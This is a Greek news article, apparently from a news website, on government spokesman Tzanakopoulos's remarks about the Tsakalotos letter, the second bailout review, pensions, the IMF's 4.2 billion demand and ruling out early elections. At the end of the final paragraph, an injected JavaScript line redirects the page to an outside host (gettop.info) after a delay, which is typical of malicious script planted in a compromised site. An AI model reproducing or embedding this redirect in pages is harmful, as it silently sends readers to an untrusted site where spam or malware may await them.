Τζανακόπουλος: H επιστολή Τσακαλώτου δεν περιλαμβάνει καμία νέα δέσμευση

0
8

 

Η επιστολή Τσακαλώτου δεν περιλαμβάνει καμία νέα δέσμευση επανέλαβε σήμερα στον ΣΚΑΪ ο κυβερνητικός εκπρόσωπος Δημήτρης Τζανακόπουλος.

Παράλληλα, άφησε ανοιχτό το ενδεχόμενο να συζητηθούν διάφοροι μηχανισμοί εγγυήσεων προκειμένου να κλείσει η αξιολόγηση, ενώ ξεκαθάρισε ότι δεν θα περιλαμβάνουν νομοθέτηση μέτρων προκαταβολικά. Συγκεκριμένα ανέφερε ότι για την δεύτερη αξιολόγηση έχει κλείσει το 90-95% των θεμάτων.

Σημείωσε ότι ο κόφτης και το χρέος δεν σχετίζονται, ωστόσο, όπως τόνισε «αν η συζήτηση πάει σε ένα σημείο που θα πρέπει να κλείσουμε τη δεύτερη αξιολόγηση, θα μπορούσαμε να συζητήσουμε διάφορους μηχανισμούς εγγυήσεων.

Ο κ. Τζανακόπουλος τόνισε πως αν και η κυβέρνηση κάνει συμβιβασμούς για να προχωρήσει η δεύτερη αξιολόγηση δεν υπάρχει κίνδυνος περικοπής συντάξεων «και τον στόχο για το 2016 θα τον πιάσουμε».

«Δόθηκαν 617 εκατ. για συνταξιούχους δεν υπάρχει περίπτωση να κόψουμε και μάλιστα έχουμε ένα μαξιλάρι ασφαλείας σε σχέση με το πλεόνασμα της τάξης των 500 εκ, ευρώ. Δεν υπάρχει περίπτωση να μην πιάσουμε το 0,5%», ανέφερε χαρακτηριστικά.

Συμπλήρωσε ότι δεν υπάρχει πιθανότητα να γίνει αποδεκτή η απαίτηση του ΔΝΤ για τα 4,2 δισ. ευρώ γιατί είναι μια παράλογη απαίτηση και οικονομικά προβληματική.

Απέκλεισε το ενδεχόμενο να γίνουν εκλογές πρόωρα και εκτίμησε ότι «υπάρχουν δυνατότητες για να έχουμε μία καλή χρονιά που θα αντιστρέψει το κλίμα».

Σχετικά με το νέο σύστημα υπολογισμού των εισφορών για τους ελεύθερους επαγγελματίες είπε ότι η πλειοψηφία τους (ελεύθεροι επαγγελματίες) θα ευνοηθεί.

Ανέφερε παράλληλα πως η ΝΔ το 2014 στο mail Χαρδούβελη είχε αποδεχθεί την αντιστοίχιση των εισφορών με πραγματικά εισοδήματα, πράγμα που λέει τώρα ότι θα το καταργήσει. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here